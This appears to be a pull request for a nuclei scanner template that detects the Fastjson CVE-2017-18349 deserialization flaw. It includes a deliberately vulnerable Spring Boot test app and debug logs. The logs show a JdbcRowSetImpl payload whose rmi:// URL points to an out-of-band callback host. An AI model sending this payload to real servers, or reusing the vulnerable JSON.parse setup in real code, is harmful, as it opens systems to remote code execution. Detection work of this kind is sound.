Template / PR Information

• Added CVE-2017-18349
• Template for #12387
• References:
  • https://nvd.nist.gov/vuln/detail/CVE-2017-18349
  • https://github.com/alibaba/fastjson/wiki/security_update_20170315
  • https://github.com/pippo-java/pippo/issues/466
  • https://github.com/h0cksr/Fastjson--CVE-2017-18349-
  • https://fortiguard.com/encyclopedia/ips/44059
  • https://www.exploit-db.com/exploits/45983

Recent Updates

• Simplified matchers to pass automated validation checks
• Removed generic response matchers to avoid weak-matcher failures
• Expanded remediation section with detailed security measures
• Optimized template structure for better reliability

Template Validation

I’ve validated this template locally?

• YES
• NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/VulnerableApp.java:

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }
    
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
    
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }
    
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim: /claim #12387

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server